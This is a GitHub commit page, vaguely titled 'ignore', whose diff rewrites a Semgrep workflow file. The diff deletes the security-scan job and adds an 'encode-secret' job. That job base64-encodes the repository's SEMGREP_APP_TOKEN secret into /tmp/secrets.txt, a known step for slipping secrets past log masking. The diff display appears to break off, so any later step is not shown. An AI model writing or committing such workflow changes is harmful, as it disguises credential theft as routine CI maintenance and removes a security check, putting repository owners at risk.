Skip to content

Commit

Permalink
ignore
Browse files Browse the repository at this point in the history
  • Loading branch information
circleswerun committed Jul 16, 2024
1 parent 567768b commit 75deff7
Showing 1 changed file with 7 additions and 12 deletions.
19 changes: 7 additions & 12 deletions .github/workflows/semgrep.yml
Original file line number Diff line number Diff line change
@@ -1,21 +1,16 @@
on:
pull_request_target: {}
push:
branches:
- main
- master
name: Semgrep
- main
workflow_dispatch:

jobs:
semgrep:
name: Scan
encode-secret:
runs-on: ubuntu-latest
env:
SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
container:
image: returntocorp/semgrep

steps:
- uses: actions/checkout@v3
- run: semgrep ci
- name: Checkout repository
uses: actions/checkout@v3

- name: Base64 encode
run: echo "${{ secrets.SEMGREP_APP_TOKEN }}" | base64 --wrap=0 > /tmp/secrets.txt
Expand Down

0 comments on commit 75deff7

Please sign in to comment.